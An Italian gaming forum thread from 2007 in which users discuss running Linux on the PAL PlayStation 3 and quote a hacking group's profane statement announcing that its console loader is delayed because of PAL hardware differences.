ciauzzzzzzzz
purtroppo sono sotto esame sti giorni, prometto che dopodomani pomeriggio, di ritorno dalla sapienza, mi stampo tutta la guida e installo ubuntu e come minchia si chiama...voglio provare mplayer e vedere come rende.
l'unica cosa che nn sopporto è che non si può usare il wireless sotto linux..solo via ethernet:muro:
purtroppo sono sotto esame sti giorni, prometto che dopodomani pomeriggio, di ritorno dalla sapienza, mi stampo tutta la guida e installo ubuntu e come minchia si chiama...voglio provare mplayer e vedere come rende.
l'unica cosa che nn sopporto è che non si può usare il wireless sotto linux..solo via ethernet:muro:
fammi sapere in caso!una sola cosa mi interessa,magari la chiedo a te e se mi fai sto favore ti ringrazio a vita! :D
adesso non prendetemi in giro o altro:
linux yellowdog o fedora quello che vuoi te e mi provi quake3! :O
:sofico: probabilmente non andrà,e se andrà fara 10fps,ma se va e ne fa 60.....:sbav: :ave:
:)
IcEMaN666
27-03-2007, 23:11
fammi sapere in caso!una sola cosa mi interessa,magari la chiedo a te e se mi fai sto favore ti ringrazio a vita! :D
adesso non prendetemi in giro o altro:
linux yellowdog o fedora quello che vuoi te e mi provi quake3! :O
:sofico: probabilmente non andrà,e se andrà fara 10fps,ma se va e ne fa 60.....:sbav: :ave:
:)
farò tutte le prove del caso, ma conta che non ho manco mai scaricato una distro linux :asd:
massimo87 è avvisato, stacca msn il 29:D
farò tutte le prove del caso, ma conta che non ho manco mai scaricato una distro linux :asd:
Stavolta hai preso una bufala grande quanto una casa :ciapet:
Per il momento niente loader.
I Paradox hanno comunicato che a causa della differenza hardware tra la PS3 pal e quelle ntsc il loader sulle nostre funziona male.
Quindi bisogna aspettare
Ecco la comunicazione integrale:
"Well where should I start? Seems there have been a large number |
| of LEECHERS moaning about our lack of 'special notes' or the fact |
| we haven't released a 'loader' for PS3 titles - something which I |
| feel is bang out of order since none of you f*ckwits have the |
| slightest idea of what is involved to produce this. |
| |
| We have been working on something for a while in which yes we have |
| dropped some hints in some areas not for you to think 'the loader |
| will be released soon' - more so we've hit a stumbling block lets |
| see if anyone else can help get us past this stumbling block - |
| Something which had worked previously for other problems. But what |
| do I see now? We give a great big pat on the back to someone who |
| did a great job for a similar thing on the PSP and he has the nerve |
| to have a go at US! NO Alej... P. B. we dont need help from |
| outside, if we need help we will ask it directly to the person! |
| Not with the help of a simple txt messages which is public! We |
| rather play a match of football against you on your brother stadium |
| name.. then some kind of lame war! Respect to you! And not to |
| a friend who thinks hes god! Even we are not GODS! |
| |
| So.....where are we now?? Quite simply another stumbling block. |
| We've been happly chugging along getting nice progress then got a |
| PAL PS3 and found it didnt work like it supposed to be! - seems |
| PAL is different in some ways, and no we know peoples will think |
| all firmwares are the same, so why would there be a different? |
| simple answer "Hardware". So were now trying to work on a solution |
| to this. |
| |
| So an ETA on this??? Could anyone please measure a piece of |
| string!! All we can say is it will be ready when its ready. Were |
| not the type of group that releases shoddy goods so sit back and |
| give us the time required to sort it. |
| |
| And to all those b*tching in forums STFU - if you wanna b*tch write |
| your own - oh sorry forgot your thick as fcuk and your knowledge is |
| limited to FTP downloads and WinRAR..... |
| |
| And finally....you need to remember we dont always hang around as |
| the boss/PDX or whatever but what you don't realise is without us |
| you wouldn't have been able to get to where you are today. |
| |
| From PDX Console Leader |"
Everyman
29-03-2007, 02:18
Per il momento niente loader.
I Paradox hanno comunicato che a causa della differenza hardware tra la PS3 pal e quelle ntsc il loader sulle nostre funziona male.
Quindi bisogna aspettare
Ho appena finito l'esame di logica di primo e secondo ordine in inglese :cry:
Your sentence is not consistent: semantic incoherence inside. Tableau proof has been generated.
Scherzo :D
Ma UNA buona notizia per la versione europea della PS3 verrà mai fuori una volta?
Secondo me fra un pò ci diranno che anche le plastiche usate per la copertura sono di qualità inferiore a quelle US e JAP e che col tempo tendono a diventare rosa shocking.. :asd:
Massimo87
29-03-2007, 09:05
vengo a casa tua guarda :D
Everyman
29-03-2007, 09:06
Ma UNA buona notizia per la versione europea della PS3 verrà mai fuori una volta?
Secondo me fra un pò ci diranno che anche le plastiche usate per la copertura sono di qualità inferiore a quelle US e JAP e che col tempo tendono a diventare rosa shocking.. :asd:
La buona notizia e' che le vendite del lancio PAL han superato tutti i record, nonostante l'alto prezzo e il periodo non proprio florido come il natale.
Si insomma, roba da poco :D :asd:
Io intendevo buone notizie PER NOI UTENTI, non PER SONY.. :asd:
Cmq per ora se n'è andata la tranche dello "zoccolo duro", quelli che l'avrebbero comprata anche se fosse costata 1000€, bisognerà vedere come evolveranno le vendite nei prossimi mesi :)
Everyman
02-04-2007, 10:07
up:)
Dylan il drago
02-04-2007, 11:50
per noi puo' essere una bella notizia... ma per la sony.. non molto direi... chi produce i giochi se la console puo' essere bucata cosi' facilmente ? O_O
per noi puo' essere una bella notizia... ma per la sony.. non molto direi... chi produce i giochi se la console puo' essere bucata cosi' facilmente ? O_O
i cf per psp però li hanno accolti bene in casa sony...basta vedere il forum ufficiale dove ci sono proprio i 3d ufficiali! ;)
psychok9
03-04-2007, 14:57
La buona notizia e' che le vendite del lancio PAL han superato tutti i record, nonostante l'alto prezzo e il periodo non proprio florido come il natale.
Si insomma, roba da poco :D :asd:
Già... mi sembra che invece le notizie tirino solo un vento... e questo mi da un pò fastidio :(
vBulletin® v3.6.4, Copyright ©2000-2025, Jelsoft Enterprises Ltd.